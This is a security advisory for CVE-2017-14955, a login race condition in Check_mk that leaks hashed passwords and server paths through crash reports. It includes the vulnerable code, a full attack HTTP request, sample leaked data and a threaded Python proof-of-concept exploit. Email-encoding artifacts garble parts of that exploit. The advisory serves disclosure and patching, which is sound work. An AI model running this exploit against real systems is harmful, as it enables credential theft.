209 lines
No EOL
6.5 KiB
Python
Executable file
209 lines
No EOL
6.5 KiB
Python
Executable file
1. ADVISORY INFORMATION
|
|
=======================
|
|
Product: Check_mk
|
|
Vendor URL: https://mathias-kettner.de/check_mk.html
|
|
Type: Race Condition [CWE-362]
|
|
Date found: 2017-09-21
|
|
Date published: 2017-10-18
|
|
CVSSv3 Score: 7.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
|
|
CVE: CVE-2017-14955
|
|
|
|
|
|
2. CREDITS
|
|
==========
|
|
This vulnerability was discovered and researched by Julien Ahrens from
|
|
RCE Security.
|
|
|
|
|
|
3. VERSIONS AFFECTED
|
|
====================
|
|
Check_mk v1.2.8p25
|
|
Check_mk v1.2.8p25 Enterprise
|
|
older versions may be affected too.
|
|
|
|
|
|
4. INTRODUCTION
|
|
===============
|
|
Check_MK is comprehensive IT monitoring solution in the tradition of Nagios.
|
|
Check_MK is available as Raw Edition, which is 100% pure open source, and as
|
|
Enterprise Edition with a lot of additional features and professional support.
|
|
|
|
(from the vendor's homepage)
|
|
|
|
|
|
5. VULNERABILITY DETAILS
|
|
========================
|
|
Check_mk is vulnerable to an unauthenticated information disclosure through a
|
|
race condition during the authentication process when trying to authenticate
|
|
with a valid username and an invalid password.
|
|
|
|
On a failed login, the application calls the function save_users(), which
|
|
performs two os.rename operations on the files "contacts.mk.new" and
|
|
"users.mk.new" (see /packages/check_mk/check_mk-1.2.8p25/web/htdocs/userdb.py):
|
|
|
|
[..]
|
|
# Check_MK's monitoring contacts
|
|
filename = root_dir + "contacts.mk.new"
|
|
out = create_user_file(filename, "w")
|
|
out.write("# Written by Multisite UserDB\n# encoding: utf-8\n\n")
|
|
out.write("contacts.update(\n%s\n)\n" % pprint.pformat(contacts))
|
|
out.close()
|
|
os.rename(filename, filename[:-4])
|
|
|
|
# Users with passwords for Multisite
|
|
filename = multisite_dir + "users.mk.new"
|
|
make_nagios_directory(multisite_dir)
|
|
out = create_user_file(filename, "w")
|
|
out.write("# Written by Multisite UserDB\n# encoding: utf-8\n\n")
|
|
out.write("multisite_users = \\\n%s\n" % pprint.pformat(users))
|
|
out.close()
|
|
os.rename(filename, filename[:-4])
|
|
[...]
|
|
|
|
When sending many concurrent authentication requests with an existing/valid
|
|
username, such as:
|
|
|
|
POST /check_mk/login.py HTTP/1.1
|
|
Host: localhost
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
Content-Type: multipart/form-data; boundary=---9519178121294961341040589727
|
|
Content-Length: 772
|
|
Connection: close
|
|
Upgrade-Insecure-Requests: 1
|
|
|
|
---9519178121294961341040589727
|
|
Content-Disposition: form-data; name="filled_in"
|
|
|
|
login
|
|
---9519178121294961341040589727
|
|
Content-Disposition: form-data; name="_login"
|
|
|
|
1
|
|
---9519178121294961341040589727
|
|
Content-Disposition: form-data; name="_origtarget"
|
|
|
|
index.py
|
|
---9519178121294961341040589727
|
|
Content-Disposition: form-data; name="_username"
|
|
|
|
omdadmin
|
|
---9519178121294961341040589727
|
|
Content-Disposition: form-data; name="_password"
|
|
|
|
welcome
|
|
---9519178121294961341040589727
|
|
Content-Disposition: form-data; name="_login"
|
|
|
|
Login
|
|
---9519178121294961341040589727--
|
|
|
|
Then it could happen that one of both os.rename() calls references a non-
|
|
existing file, which has just been renamed by a previous thread. This causes the
|
|
Python script to fail and throw a crash report, which discloses a variety of
|
|
sensitive information, such as internal server paths, account details including
|
|
hashed passwords:
|
|
|
|
</pre></td></tr><tr class="data odd0"><td class="left">Local Variables</td><td><pre>{'contacts': {u'admin': {'alias': u'Administrator',
|
|
'contactgroups': ['all'],
|
|
'disable_notifications': False,
|
|
'email': u'admin@example.com',
|
|
'enforce_pw_change': False,
|
|
'last_pw_change': 0,
|
|
'last_seen': 0.0,
|
|
'locked': False,
|
|
'num_failed': 0,
|
|
'pager': '',
|
|
'password': '$1$400000$13371337asdfasdf',
|
|
'roles': ['admin'],
|
|
'serial': 2},
|
|
|
|
A script to automatically exploit this vulnerability can be found on [0].
|
|
|
|
6. POC
|
|
======
|
|
|
|
#!/usr/bin/python
|
|
# Exploit Title: Check_mk <=3D v1.2.8p25 save_users() Race Condition
|
|
# Version: <=3D 1.2.8p25
|
|
# Date: 2017-10-18
|
|
# Author: Julien Ahrens (@MrTuxracer)
|
|
# Homepage: https://www.rcesecurity.com
|
|
# Software Link: https://mathias-kettner.de/check_mk.html
|
|
# Tested on: 1.2.8p25
|
|
# CVE:=09=09 CVE-2017-14955
|
|
#
|
|
# Howto / Notes:
|
|
# This scripts exploits the Race Condition in check_mk version 1.2.8p25 and
|
|
# below as described by CVE-2017-14955. You only need a valid username to
|
|
# dump all encrypted passwords and make sure to setup a local proxy to
|
|
# catch the dump. Happy brute forcing ;-)
|
|
|
|
import requests
|
|
import threading
|
|
|
|
try:
|
|
=09from requests.packages.urllib3.exceptions import InsecureRequestWarning
|
|
=09requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
|
|
except:
|
|
=09pass
|
|
|
|
# Config Me
|
|
target_url =3D "https://localhost/check_mk/login.py"
|
|
target_username =3D "omdadmin"
|
|
|
|
proxies =3D {
|
|
'http': 'http://127.0.0.1:8080',
|
|
'https': 'http://127.0.0.1:8080',
|
|
}
|
|
|
|
def make_session():
|
|
=09v =3D requests.post(target_url, verify=3DFalse, proxies=3Dproxies, files=
|
|
=3D{'filled_in': (None, 'login'), '_login': (None, '1'), '_origtarget': (No=
|
|
ne, 'index.py'), '_username': (None, target_username), '_password': (None, =
|
|
'random'), '_login': (None, 'Login')})
|
|
=09return v.content
|
|
|
|
NUM =3D 50
|
|
|
|
threads =3D []
|
|
for i in range(NUM):
|
|
t =3D threading.Thread(target=3Dmake_session)
|
|
threads.append(t)
|
|
t.start()
|
|
|
|
7. RISK
|
|
=======
|
|
To successfully exploit this vulnerability an unauthenticated attacker must only
|
|
have network-level access to the application.
|
|
|
|
The vulnerability allows remote attackers to trigger an exception, which
|
|
discloses a variety of sensitive internal information such as:
|
|
- Local server paths
|
|
- Usernames
|
|
- Passwords (hashed)
|
|
- and user directory-specific attributes (i.e. LDAP)
|
|
|
|
|
|
8. SOLUTION
|
|
===========
|
|
Update to 1.2.8p26.
|
|
|
|
|
|
9. REPORT TIMELINE
|
|
==================
|
|
2017-09-21: Discovery of the vulnerability
|
|
2017-09-21: Sent limited information to publicly listed email address
|
|
2017-09-21: Vendor responds and asks for details
|
|
2017-09-21: Full vulnerability details sent to vendor
|
|
2017-09-25: Vendor pushes fix to git
|
|
2017-10-01: MITRE assigns CVE-2017-14955
|
|
2017-10-16: Fix confirmed
|
|
2017-10-18: Public disclosure
|
|
|
|
|
|
10. REFERENCES
|
|
=============
|
|
[0] https://www.rcesecurity.com/2017/10/cve-2017-14955-win-a-race-against-check-mk-to-dump-all-your-login-data/
|
|
[1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14955 |